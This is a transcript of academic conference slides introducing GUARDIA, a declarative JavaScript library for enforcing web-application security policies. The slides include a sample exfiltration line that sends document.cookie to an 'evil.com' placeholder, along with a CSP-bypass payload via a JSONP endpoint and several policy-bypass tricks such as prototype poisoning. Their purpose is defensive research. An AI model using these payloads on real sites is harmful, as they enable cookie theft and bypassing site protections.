Declaratively Specifying Security Policies For Web Applications, Angel Luis Scull Pupo

Transcript

1. Declaratively Specifying Security Policies For Web Applications Angel Luis Scull

   Pupo, Jens Nicolay, Elisa Gonzalez Boix {ascullpu, jens.nicolay, egonzale}@vub.ac.be 1

2. Motivation Browser 0 0 0 Search 2 Stock services Weather

   information Advertisement … Composed

3. Browser 0 0 0 Search <html> <head> <script src=“http://evil.com”></script> <script

   src="http://good.com"></script> … </head> <body> … Window Document Location History … let evilImage = document.createElement('img'); evilImage.src = ‘http://evil.com?user='+document.cookie; Motivation 3

4. let evilImage = document.createElement('img'); evilImage.src = ‘http://evil.com/takeThis?user='+document.cookie; A policy that

   restrict which URLs are allowed in the src of images Security policy 4 A security policy restricts application behavior to prevent vulnerabilities/attacks.

5. Security policies at browser level 5 default-src ‘self’ good.com; script-src

   ’self’; Content Security Policy my.cite.com <img src=“//good.com/image.jpg”> <script src=“/code.js”> good.com my.cite.com Allowed <script src=“//attacker.com/ code.js”> attacker.com Blocked

6. Security policies at browser level script-src ‘self’ https://whitelisted.com; object-src none;

   JSONP-like endpoint in whitelist ">'><script src="https://whitelisted.com/jsonp?callback=alert" Bypass Weissbacher, Michael, Tobias Lauinger, and William Robertson. "Why is CSP failing? trends and challenges in CSP adoption." International Workshop on Recent Advances in Intrusion Detection. Springer International Publishing, 2014.

7. How can application-dependent security policies be expressed? 7

8. 8 enforcePolicy({target: document, method: ‘createElement’}, function(invocation){ var str = stringOf(invocation,

   0); if(str.indexOf(‘iframe’)>=0){ return; }else invocation.proceed(); } ); Related works J. Magazinius, P. H. Phung, and D. Sands. Safe Wrappers and Sane Policies for Self Protecting JavaScript. In Informatics, pages 239–255. Berlin, Heidel- berg, 2012 • Flexible. • Programmers have to write code to enforce the policy. • Programmers have no control in the execution order of the policies Safe Wrappers and Sane Policies for Self Protecting JavaScript

9. 9 around(document.createElement, function (c : K, tag : U) {

   let elt : U = uCall(document, c, tag);
 if (elt.nodeName == "IFRAME") throw ’err’; else return elt; }); Related works L. A. Meyerovich and B. Livshits. ConScript: Specifying and Enforcing Fine-Grained Security Policies for JavaScript in the Browser. pages 481–496. IEEE, 2010. • Flexible. • Capable of express wide range of policies. • Programmers have to write code to enforce the policy. • Limited portability. ConScript: Specifying and Enforcing Fine-Grained Security Policies for JavaScript in the Browser

10. GUARDIA Our approach 10 Policies should be composable. Policies should

    be easy to develop. Programmers should be out of concern about the enforcement mechanism.

11. Construct Description Allow(arr : Array<String>) => TBase Limit the execution

    to the supplied properties Deny(arr : Array<String>) => TBase Deny the execution of the supplied properties Not(p: TBase) => TBase Negates the result of the policy given as parameter And(pArr: Array<TBase>) => TBase Perform logical and using policies given as parameters Or(pArr: Array<TBase>) => TBase Perform logical or using policies given as parameters ParamAt((...ps)=> Boolean, pIdx: Number, arr : Array<Any>) => TBase Apply a function to one parameter of the actual execution StateFnParam((...ps)=> Boolean,s: String, arr : Array<Any>) => TBase Apply a function to one state during an execution step API of GUARDIA concepts 11

12. A policy that restrict which URLs are allowed in the

    src of images Security policy specification with GUARDIA 12 let whiteListedSrc = ac.Or(ac.And(ac.Allow(['src']), ac.ParamInList(0,whiteURLs)), ac.Not(ac.Allow([‘src'])));

13. Can JavaScript’s reflective capabilities be employed to enforce security policies

    without compromising the transparency and tamper-proofness? 13

14. 14 Enforcement mechanism The enforcement mechanism should be portable across

    different platforms. The enforcement mechanism should be tamper-proof. The enforcement mechanism should be transparent.

15. Document Proxy Attacker Document Attacker ? Attacker model and enforcement

    mechanism Monitor the execution to uphold security policies 15 All loaded code sources are potentially malicious!

16. window document location history … window = makeSecureProxy(window); … Problems

    with browser’s builtin objects 16 Unable to override builtin objects Builtin objects

17. Built-in Regular Function proxies wrap every method of the target

    Object proxy wrap the entire target GUARDIA’s enforcement approach 17

18. { whenRead : [], readListeners : [], whenWrite : [],

    writeListeners: [] } … { get: function(tar, prop, rec) //security policy enforcement return Reflect.get(tar, prop, rec); }, set: function(tar, prop, val, rec){ //security policy enforcement return Reflect.set(tar, prop, val, rec); } } Policy configuration object Deployment of security policies 18 … { apply: function (targetFn, thisArg, arglist) { //security enforcement return targetFn.apply(thisArg, arglist); } }

19. Policy configuration object Enforcing policies in GUARDIA 19 ac.installPolicy({ whenRead:

    [ac.Not(ac.And(ac.Allow([‘createElement']), ac.ParamAt(equals, 0, 'iframe')))] }).on(document)

20. var liarObj = { value: 'div', toString: function(){ var t

    = this.value; this.value = 'iframe'; return t; } } console.log(liarObj.toString()); //div console.log(liarObj.toString()); //iframe toString and valueOf redefinition 20 Example of toString redefinition Not( And( Allow([‘createElement’]), ParamAt(equals, 0, ’iframe’)) Not( And( Allow([‘createElement’]), ParamAt(equals, stringOf(0), ’iframe’)) Gets the string value once!

21. Function aliasing 21 Attacker’s code var openCopy = window.open …

    installPolicy({ whenRead: [Deny([‘open’])] }).on(window) … openCopy.call(window,’bad.com’) Code for security Security bypassed <html> <header> <script src=“path/to/guardia.js”> </script> … </header> <body> … </html> First executed script

22. Prototype poisoning 22 var allowedUrls = { ‘valid.com’ : true

    } function isAllowed(url){ return allowedUrls[url] === true; } isAllowed(‘invalid.com’); //false Object.prototype[‘invalid.com’] = true; isAllowed(‘invalid.com’); //true Object.seal(Object.prototype); ECMAScript 5 features that allows prevent unintended changes in objects

23. 1 Injection 2 Broken Authentication and Session Management 3 Cross

    Site Scripting 4 Insecure Direct Object Reference 5 Security Misconfiguration 6 Sensitive Data Exposure 7 Missing Function Level Access Control 8 Cross Site Request Forgery 9 Using Components with Known Vulnerabilities 10 Unvalidated Redirects and Forwards https://www.owasp.org OWASP Top ten vulnerabilities 23

24. Attack type Security policy HV [6] Yu et al. [28]

    Phung et al. [20] ML [15] GUARDIA Forgery Limited number of popup windows opened (P1) 3 3 3 3 3 Forgery No popup windows without location and status bar 3 3 Resource abuse Prevent abuse of resources like modal dialogues (P2) 3 3 3 3 Restoring built-ins from frames Disallow dynamic iframe creation (P3) 3 3 3 Information leakage Disabling page redirects after document.cookie read (P4) 3 3 3 3 3 Information leakage Allowing redirections for a whitelist of URLs (P5) 3 3 3 Information leakage Restrict XMLHttpRequest to secure connections and whitelist URLs (P6) 3 3 Information leakage Disallow setting of src property 3 3 Information leakage Disallow setting of location property 3 3 3 Impersonation XMLHttpRequest is restricted to HTTPS connections (P6) 3 3 Impersonation / Information leakage Disallow open and send methods of XHR object 3 3 3 Man in the middle postMessage can only send to the origins in a whitelist (P7) 3 3 Run arbitrary code*(fix) Disallow string arguments to setInterval & setTimeout (P8) 3 3 Table 1. Comparison of approaches in security policies. Policy numbers P1 to P8 refer to the policies discussed in section 4. Results 24

25. OWASP Juice Shop https://juice-shop.herokuapp.com/ Applying GUARDIA to an existing application

    25 https://juice-shop.herokuapp.com/#/score-board Vulnerabilities and challenges

26. Applying GUARDIA to Juice Shop 26

27. Applying GUARDIA to Juice Shop 27 <html> <header> <script src=“path/to/guardia.js”>

    </script> <script src=“path/to/implemented_policies.js”> </script> … </header> <body> … </html> … let noAlert = Deny([‘alert’,’prompt','confirm']); … installPolicy({ whenRead: [noAlert], … }).on(window); …

28. Conclusion We presented GUARDIA an internal DSL for securing Javascript

    applications. GUARDIA is agnostic of the underlying enforcement mechanism. GUARDIA is able to express wide range of security policies from related literature. 28

29. Declaratively Specifying Security Policies For Web Applications Angel Luis Scull

    Pupo, Jens Nicolay, Elisa Gonzalez Boix {ascullpu, jens.nicolay, egonzale}@vub.ac.be 29